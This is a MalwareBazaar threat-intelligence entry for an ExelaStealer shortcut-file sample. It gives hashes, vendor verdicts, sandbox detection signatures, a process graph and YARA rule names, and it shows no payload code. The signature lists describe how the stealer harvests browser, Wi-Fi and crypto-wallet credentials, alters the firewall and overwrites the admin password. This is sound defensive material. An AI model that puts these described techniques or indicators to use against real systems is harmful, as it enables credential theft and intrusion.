MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a539275d837cf5501e0d98abce56f16ca8f97c9d06662162278c0dffb783d7de. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


ExelaStealer


Vendor detections: 10


Intelligence 10 IOCs YARA 5 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: a539275d837cf5501e0d98abce56f16ca8f97c9d06662162278c0dffb783d7de
SHA3-384 hash: 52337d6be6acb8160734c03a789d7b46e570a3219b75f1c0464fb9117369bcd9237585414816a6bcd6929bab946ca57c
SHA1 hash: 9e4b44b50e79de9a461cd1ff0027fd641bc747a4
MD5 hash: a6bbbc0fa1d897a9c5838f8cc0de53e1
humanhash: romeo-charlie-moon-indigo
File name:a539275d837cf5501e0d98abce56f16ca8f97c9d06662162278c0dffb783d7de
Download: download sample
Signature ExelaStealer
Create hunting rule
File size:169'695 bytes
First seen:2025-05-09 07:37:22 UTC
Last seen:Never
File type:Shortcut (lnk) lnk
MIME type:application/x-ms-shortcut
ssdeep 3072:MXB/mSMFdgEu5sQGcxVZYagzOEXo60RzHMKQ2/v4ErX5pv2dXU/mXY+xwTu:MXB/mSMFdgEuROe1HM/2YW/uUTu
TLSH T16BF3BFE46D2262C0E959D2BD5497F0EBE00309AC5D13C2F34C5A07DB0AEBB587A5BC5E
Magika lnk
Reporter JAMESWT_WT
Tags:ExelaStealer gitlab-com-project-69565380 lnk

Intelligence

File Origin
# of uploads :
1
# of downloads :
104
Origin country :
IT IT
Vendor Threat Intelligence
Detection(s):
MiscreantPunch.SingleXOR.EXE.52.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.LOLBinOddLookPSHELL.20220711.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.OddLook.202207213.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
99.9%
Link:
https://cyber-fortress.com/docs/result/index.php?id=681db0fc6c95617a27b63407
Tags:
obfuscated ransomware sage
Result
Verdict:
Malicious
File Type:
LNK File - Malicious
Link:
https://app.docguard.net/a539275d837cf5501e0d98abce56f16ca8f97c9d06662162278c0dffb783d7de/results/dashboard
Behaviour
BlacklistAPI detected
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
obfuscated
Link:
https://www.filescan.io/uploads/681db0edbab2591d06552f84/reports/12bb6186-3b19-4949-853f-b4cb959eb761/overview
Verdict:
Malicious
Labled as:
BZC.YAX.Pantera.190
Link:
https://www.hybrid-analysis.com/sample/a539275d837cf5501e0d98abce56f16ca8f97c9d06662162278c0dffb783d7de
Result
Threat name:
Python Stealer, Koadic, Babadeda, Exela
Create hunting rule
Detection:
malicious
Classification:
rans.phis.bank.troj.spyw.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1685144
Signature
Bypasses PowerShell execution policy
Detected generic credential text file
Detected unpacking (overwrites its own PE header)
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Gathers network related connection and port information
Joe Sandbox ML detected suspicious sample
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Overwrites the password of the administrator account
Potential dropper URLs found in powershell memory
Powershell creates an autostart link
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Capture Wi-Fi password
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suricata IDS alerts for network traffic
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal WLAN passwords
Uses attrib.exe to hide files
Uses netsh to modify the Windows network and firewall settings
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Babadeda
Yara detected Exela Stealer
Yara detected Generic Downloader
Yara detected Generic Python Stealer
Yara detected Koadic BAT payload
Yara detected Python Stealer
Yara detected Waltuhium Grabber
Yara detected WIFI Password Stealer
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1685144 Sample: mPKnZxX6wS.lnk Startdate: 09/05/2025 Architecture: WINDOWS Score: 100 110 store1.gofile.io 2->110 112 raw.githubusercontent.com 2->112 114 4 other IPs or domains 2->114 128 Suricata IDS alerts for network traffic 2->128 130 Malicious sample detected (through community Yara rule) 2->130 132 Sigma detected: Capture Wi-Fi password 2->132 134 18 other signatures 2->134 13 powershell.exe 3 22 2->13         started        signatures3 process4 file5 106 C:\Users\user\AppData\Local\ixx.exe, PE32 13->106 dropped 172 Found many strings related to Crypto-Wallets (likely being stolen) 13->172 174 Found suspicious powershell code related to unpacking or dynamic code loading 13->174 176 Powershell creates an autostart link 13->176 178 Powershell drops PE file 13->178 17 ixx.exe 8 13->17         started        21 notepad.exe 5 13->21         started        23 conhost.exe 1 13->23         started        signatures6 process7 file8 86 C:\Users\user\AppData\Local\Temp\...\50E3.bat, Non-ISO 17->86 dropped 122 Windows shortcut file (LNK) starts blacklisted processes 17->122 124 Multi AV Scanner detection for dropped file 17->124 126 Detected unpacking (overwrites its own PE header) 17->126 25 cmd.exe 1 17->25         started        signatures9 process10 signatures11 148 Windows shortcut file (LNK) starts blacklisted processes 25->148 150 Suspicious powershell command line found 25->150 152 Bypasses PowerShell execution policy 25->152 154 4 other signatures 25->154 28 dos.exe 75 25->28         started        32 powershell.exe 14 16 25->32         started        35 conhost.exe 25->35         started        process12 dnsIp13 96 C:\Users\...\_quoting_c.cp313-win_amd64.pyd, PE32+ 28->96 dropped 98 C:\Users\user\AppData\...\win32evtlog.pyd, PE32+ 28->98 dropped 100 C:\Users\user\AppData\Local\...\win32api.pyd, PE32+ 28->100 dropped 104 35 other files (none is malicious) 28->104 dropped 162 Multi AV Scanner detection for dropped file 28->162 164 Modifies the windows firewall 28->164 166 Tries to harvest and steal WLAN passwords 28->166 170 2 other signatures 28->170 37 dos.exe 82 28->37         started        108 gitlab.com 172.65.251.78, 443, 49685 CLOUDFLARENETUS United States 32->108 102 C:\Users\user\AppData\Local\Temp\dos.exe, PE32+ 32->102 dropped 168 Potential dropper URLs found in powershell memory 32->168 file14 signatures15 process16 dnsIp17 116 ip-api.com 208.95.112.1, 49704, 80 TUT-ASUS United States 37->116 118 raw.githubusercontent.com 185.199.109.133, 443, 49709 FASTLYUS Netherlands 37->118 120 4 other IPs or domains 37->120 88 C:\Users\user\AppData\Local\...\Waltuhium.exe, PE32+ 37->88 dropped 90 C:\Users\user\AppData\...\places.sqlite-shm, data 37->90 dropped 92 C:\Users\user\AppData\...\cookies.sqlite-shm, data 37->92 dropped 94 10 other malicious files 37->94 dropped 140 Windows shortcut file (LNK) starts blacklisted processes 37->140 142 Found many strings related to Crypto-Wallets (likely being stolen) 37->142 144 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 37->144 146 5 other signatures 37->146 42 cmd.exe 37->42         started        45 cmd.exe 37->45         started        47 cmd.exe 37->47         started        49 13 other processes 37->49 file18 signatures19 process20 signatures21 156 Overwrites the password of the administrator account 42->156 51 systeminfo.exe 42->51         started        66 9 other processes 42->66 158 Windows shortcut file (LNK) starts blacklisted processes 45->158 54 cmd.exe 45->54         started        56 conhost.exe 45->56         started        58 cmd.exe 47->58         started        60 conhost.exe 47->60         started        160 Tries to harvest and steal WLAN passwords 49->160 62 WMIC.exe 49->62         started        64 tasklist.exe 49->64         started        68 23 other processes 49->68 process22 signatures23 136 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 51->136 70 WmiPrvSE.exe 51->70         started        72 chcp.com 54->72         started        74 chcp.com 58->74         started        138 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 62->138 76 Conhost.exe 64->76         started        78 net1.exe 66->78         started        80 quser.exe 66->80         started        82 net1.exe 66->82         started        84 2 other processes 66->84 process24
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/a539275d837cf5501e0d98abce56f16ca8f97c9d06662162278c0dffb783d7de/
Threat name:
Win32.Trojan.Pantera
Create hunting rule
Status:
Malicious
First seen:
2025-05-07 03:15:25 UTC
File Type:
Binary
Extracted files:
19
AV detection:
11 of 24 (45.83%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=uu4soxmdpt2vahqntcv44vxrnsups7e5aztccyrhrqg77n4d27pa._file
Result
Malware family:
exelastealer
Create hunting rule
Score:
  10/10
Tags:
family:exelastealer collection defense_evasion discovery execution persistence privilege_escalation pyinstaller spyware stealer
Link:
https://tria.ge/reports/250509-jgjxqs1zaw/
Behaviour
Collects information from the system
Detects videocard installed
Gathers network information
Gathers system information
Modifies registry class
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Browser Information Discovery
Detects Pyinstaller
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Permission Groups Discovery: Local Groups
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Wi-Fi Discovery
System Network Connections Discovery
Launches sc.exe
Enumerates processes with tasklist
Hide Artifacts: Hidden Files and Directories
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Network Service Discovery
Checks computer location settings
Clipboard Data
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies Windows Firewall
Grants admin privileges
Exela Stealer
Exelastealer family
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/a539275d837cf5501e0d98abce56f16ca8f97c9d06662162278c0dffb783d7de

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Base64_Encoded_Powershell_Directives
Create hunting rule
Rule name:Large_filesize_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies shortcut (LNK) file larger than 100KB. Most goodware LNK files are smaller than 100KB.
Rule name:LNK_sospechosos
Create hunting rule
Author:Germán Fernández
Description:Detecta archivos .lnk sospechosos
Rule name:PS_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies PowerShell artefacts in shortcut (LNK) files.
Rule name:SUSP_XORed_MSDOS_Stub_Message
Create hunting rule
Author:Florian Roth
Description:Detects suspicious XORed MSDOS stub message
Reference:https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings

File information

The table below shows additional information about this malware sample such as delivery method and external references.

ExelaStealer

Shortcut (lnk) lnk a539275d837cf5501e0d98abce56f16ca8f97c9d06662162278c0dffb783d7de

(this sample)

ExelaStealer

Executable exe 5b9dd8506f14373dc169b477fb7ee60512fdea77e7e666ba7120c39bfdfd2703

  
Dropping
SHA256 5b9dd8506f14373dc169b477fb7ee60512fdea77e7e666ba7120c39bfdfd2703
  
Dropping
MD5 f2312dd34a1e8ecdae24ac0386cc6725

Comments